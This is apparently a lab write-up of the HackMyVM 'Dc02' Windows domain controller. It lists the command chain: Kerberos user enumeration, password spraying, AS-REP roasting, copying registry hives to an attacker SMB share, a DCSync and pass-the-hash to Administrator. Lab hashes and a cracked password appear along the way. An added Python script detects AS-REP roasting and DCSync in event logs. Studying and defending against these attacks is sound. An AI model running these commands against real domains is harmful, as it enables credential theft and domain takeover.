# Dc02

November 18, 2024

Created by: josemlwdf
Page: HackMyVm
Difficulty: Medium
OS: Windows

I start with a scan of the open ports.

```bash
nmap -p- --open --min-rate 5000 -sS -Pn 10.0.2.4 -oG scan
```

I continue with a scan of the versions and technologies running on the open ports that were found.

```bash
nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49667,49671,49686 -sCV -Pn 10.0.2.4 -oN ports
```

Using kerbrute I search for valid users in the domain.

```bash
./kerbrute_linux_386 userenum --dc 10.0.2.5 -d SOUPEDECODE.LOCAL /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
```

With the users found I check whether any of them use their own user name as their password. I find that charlie does, and with that account I can list SMB shares.

```bash
netexec smb 10.0.2.5 -u users -p users --continue-on-success | grep -v "[-]"
```

Having read permission on the IPC$ share, I can enumerate the domain users. I run the users found through kerbrute and check again whether any of them use their user name as their password, but this time I find none.

```bash
impacket-lookupsid SOUPEDECODE.LOCAL/charlie:charlie@10.0.2.5
/opt/kerbrute_linux_386 userenum --dc 10.0.2.5 -d SOUPEDECODE.LOCAL -u usuarios valid_users -p valid_users
netexec smb 10.0.2.5 -u valid_users -p valid_users --continue-on-success | grep -v "[-]"
```

Next I try to request TGTs for users that have "Do not require Kerberos preauthentication" set (AS-REP roasting). I get the encrypted AS-REP hash of the user zximena448.

```bash
impacket-GetNPUsers SOUPEDECODE.LOCAL/ -no-pass -usersfile valid_users | grep -v "[-]"
```

I crack the hash with john and obtain the user's password in clear text.

```bash
john --wordlist=/usr/share/wordlist/rockyou.txt asrproast
```

With this new credential I check whether I can list SMB shares. Seeing that I can list all the shared folders, I move to this user's desktop and read the first flag.

Enumerating the domain with these credentials, I see that the user zximena448 belongs to the "Backup Operators" group.
Thanks to this I can back up and restore any file on the system.

```bash
ldapdomaindump -u 'SOUPEDECODE.LOCAL\zximena448' -p 'internet' 10.0.2.6
```

I share a folder over SMB from my machine and copy the SYSTEM, SECURITY and SAM hives from the victim to it. For this I use the backup_dc_registry tool (reg.py), and then with secretsdump I dump the system hashes.

```bash
impacket-smbserver recurso $(pwd) -smb2support
./reg.py zximena448:'internet'@10.0.2.5 backup -p '\\10.0.2.15\recurso'
impacket-secretsdump LOCAL -system SYSTEM -security SECURITY -sam SAM
```

With the hash found for MACHINE.ACC I check whether it is valid for any of the previously found users. It is valid for the user DC01$.

```bash
crackmapexec smb 10.0.2.5 -u /home/rufo/nmap/users -H "e74903d9cb1e9cc65339d50fe168a349" | grep -v "[-]"
```

With these credentials I perform a DCSync attack and obtain all the hashes of the domain.

```bash
netexec smb 10.0.2.5 -u "DC01$" -H "e74903d9cb1e9cc65339d50fe168a349" --ntds
```

I do pass-the-hash (PtH) with the Administrator user and read the second flag.

```bash
evil-winrm -i 10.0.2.5 -u Administrator -H "8982babd4da89d33210779a6c5b078bd"
```
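The chain above relies on two Kerberos abuses that leave distinct traces in the domain controller's Security log: the AS-REP roast of zximena448 appears as a TGT request (event 4768) issued with pre-authentication type 0, and the DCSync as DC01$ appears as a directory-access event (4662) exercising the replication control-access rights. The script below is an added example, not part of the original write-up, that runs both checks over constructed event records; the DC inventory (DC01 at 10.0.2.5 plus a hypothetical DC02 at 10.0.2.6), the logon IDs and every other sample value are assumptions. Because the DCSync was performed with the DC's own machine account, filtering 4662 on the account name alone would miss it, so the example joins each 4662 to its 4624 network logon by logon ID to recover the source address. It also includes the account-level check a defender would run to find the roastable setting before an attacker does.

```python
"""Added detection example (not part of the original write-up): scan Security-log
events for the two Kerberos abuses used in this chain, AS-REP roasting (TGT issued
without pre-authentication) and DCSync (replication rights exercised by an account
or from an address that is not a domain controller). All event records are
constructed sample data; field names follow the Windows Security log."""

# Directory replication control-access rights that DCSync needs.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_RIGHTS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

# userAccountControl bit behind "Do not require Kerberos preauthentication".
DONT_REQ_PREAUTH = 0x400000

# Assumed DC inventory (account -> address). DC01 at 10.0.2.5 matches the
# write-up; DC02 at 10.0.2.6 is hypothetical, added to show legitimate replication.
KNOWN_DCS = {"DC01$": "10.0.2.5", "DC02$": "10.0.2.6"}

SAMPLE_EVENTS = [  # constructed records, not captured from a real host
    # Normal TGT request: pre-auth type 2 (encrypted timestamp), AES ticket.
    {"EventID": 4768, "TargetUserName": "charlie", "IpAddress": "10.0.2.15",
     "PreAuthType": "2", "TicketEncryptionType": "0x12", "Status": "0x0"},
    # AS-REP roastable: no pre-auth (type 0), RC4 ticket, issued successfully.
    {"EventID": 4768, "TargetUserName": "zximena448", "IpAddress": "10.0.2.15",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0"},
    # Unknown principal probed from the same address: no ticket, nothing to crack.
    {"EventID": 4768, "TargetUserName": "nosuchuser", "IpAddress": "10.0.2.15",
     "PreAuthType": "-", "TicketEncryptionType": "0xffffffff", "Status": "0x6"},
    # Network logon of the DC machine account from a workstation address.
    {"EventID": 4624, "TargetUserName": "DC01$", "LogonType": "3",
     "IpAddress": "10.0.2.15", "TargetLogonId": "0x3e7a1"},
    # Replication rights exercised inside that logon session (the DCSync).
    {"EventID": 4662, "SubjectUserName": "DC01$", "SubjectLogonId": "0x3e7a1",
     "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # Legitimate replication from the hypothetical second DC.
    {"EventID": 4624, "TargetUserName": "DC02$", "LogonType": "3",
     "IpAddress": "10.0.2.6", "TargetLogonId": "0x5c3"},
    {"EventID": 4662, "SubjectUserName": "DC02$", "SubjectLogonId": "0x5c3",
     "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # Ordinary object access by a user: the property GUID is not a replication right.
    {"EventID": 4662, "SubjectUserName": "charlie", "SubjectLogonId": "0x9a1",
     "AccessMask": "0x10", "Properties": "{bf967a86-0de6-11d0-a285-00aa003049e2}"},
    # A plain user holding replication rights (constructed), with no matching 4624.
    {"EventID": 4662, "SubjectUserName": "zximena448", "SubjectLogonId": "0x7bd",
     "AccessMask": "0x100", "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]


def preauth_disabled(user_account_control):
    """True when an account's userAccountControl has DONT_REQ_PREAUTH set,
    i.e. the setting GetNPUsers looks for. Run this over directory exports
    to find roastable accounts before an attacker does."""
    return bool(user_account_control & DONT_REQ_PREAUTH)


def asrep_roastable(events):
    """Return (user, source address) for every 4768 whose TGT was issued without
    pre-authentication; only a successful request returns crackable material."""
    return [(e["TargetUserName"], e["IpAddress"]) for e in events
            if e["EventID"] == 4768 and e["Status"] == "0x0" and e["PreAuthType"] == "0"]


def dcsync_suspects(events):
    """Return (account, source address, reason) for each 4662 that exercised a
    replication right from a non-DC account or from an address that is not the
    DC the account belongs to."""
    # 4662 carries no network address; 4624 does. Join them on the logon ID.
    session_source = {e["TargetLogonId"]: e["IpAddress"]
                      for e in events if e["EventID"] == 4624}
    suspects = []
    for e in events:
        if e["EventID"] != 4662:
            continue
        rights = {g.strip("{}") for g in e["Properties"].split()}
        if not rights & REPLICATION_RIGHTS:
            continue
        account = e["SubjectUserName"]
        source = session_source.get(e["SubjectLogonId"])
        if account not in KNOWN_DCS:
            suspects.append((account, source, "account is not a domain controller"))
        elif source != KNOWN_DCS[account]:
            suspects.append((account, source, "replication from a non-DC address"))
    return suspects


if __name__ == "__main__":
    for user, src in asrep_roastable(SAMPLE_EVENTS):
        print(f"AS-REP without pre-auth: {user} requested from {src}")
    for account, src, why in dcsync_suspects(SAMPLE_EVENTS):
        print(f"DCSync suspect: {account} from {src}: {why}")
```

On the sample data the script reports zximena448's AS-REP request from 10.0.2.15 and two replication suspects: DC01$ (a known DC, but the session came from the workstation address rather than the DC itself) and zximena448 (a user account holding replication rights). The DC02$ replication from its own address is correctly left alone, which is why the inventory of DC accounts and addresses has to be kept accurate for this check to be useful.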